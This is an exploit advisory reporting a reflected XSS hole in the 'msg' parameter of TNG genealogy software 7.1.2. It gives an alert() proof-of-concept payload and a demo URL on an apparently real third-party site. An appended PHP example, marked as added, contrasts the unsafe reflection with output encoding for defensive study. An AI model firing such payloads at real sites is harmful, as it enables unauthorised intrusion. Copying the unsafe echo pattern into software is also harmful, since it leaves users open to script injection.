                ______     __     ______
               /\  == \   /\ \   /\  __ \   
               \ \  __<   \ \ \  \ \ \/\ \  
                \ \_____\  \ \_\  \ \_____\ 
                 \/_____/   \/_/   \/_____/ 
                            

[#]----------------------------------------------------------------[#]
# 
# [x] Target: The Next Generation of Genealogy Sitebuilding  [XSS]
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com    
# [x] Download: http://lythgoes.net/genealogy/software.php
# [x] Version: 7.1.2
# [x] Price: $29.99 USD
# [x] Thanks: packetdeath
#  
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit : 
#   
#    http://localhost/searchform.php?msg=[XSS]
#
# [x] Poc : 
#    
#   http://localhost/searchform.php?msg=searchform.php?msg="/><script>alert('XSS')</script>
#   
[#]------------------------------------------------------------------------------------------[#]
#
#  Demo : 
# 
#  [+] http://horwitzfam.org/searchform.php?msg="/><script>alert('XSS')</script>
#  
#  
[#]-------------------------------------------------------------------------------------------[#]

#EOF
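
Added example, not part of the original advisory and not TNG's source code: a sketch of how the msg parameter could be reflected unsafely and how output encoding neutralizes the PoC value above. It assumes searchform.php echoes msg into a double-quoted HTML attribute (inferred from the PoC's `"/>` prefix); the function names and the hidden input are hypothetical.

```php
<?php
// Added illustration only; NOT code from TNG. Function names and the
// surrounding <input> markup are hypothetical.

// Read msg defensively: PHP turns ?msg[]=x into an array, so reject
// anything that is not a plain string, and cap the length.
function get_msg(array $query, int $maxLen = 200): string
{
    $msg = $query['msg'] ?? '';
    if (!is_string($msg)) {
        return '';
    }
    return mb_substr($msg, 0, $maxLen, 'UTF-8');
}

// Vulnerable pattern: request data concatenated straight into markup.
// A double quote in $msg closes the attribute and the tag.
function render_msg_unsafe(string $msg): string
{
    return '<input type="hidden" name="msg" value="' . $msg . '"/>';
}

// Hardened pattern: encode for the HTML attribute context.
// ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid
// UTF-8 sequences instead of returning an empty string.
function render_msg_safe(string $msg): string
{
    $encoded = htmlspecialchars($msg, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="msg" value="' . $encoded . '"/>';
}

// Constructed request data standing in for $_GET: the PoC value from the
// advisory, and an array-valued msg as an edge case.
$requests = [
    ['msg' => '"/><script>alert(\'XSS\')</script>'],
    ['msg' => ['unexpected', 'array']],
];

foreach ($requests as $query) {
    $msg = get_msg($query);
    echo 'unsafe: ', render_msg_unsafe($msg), PHP_EOL;
    echo 'safe:   ', render_msg_safe($msg), PHP_EOL;
}
```

In the safe output the quote and angle brackets arrive as character references, so the value stays inside the attribute and no script element is created.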
 		 	   		  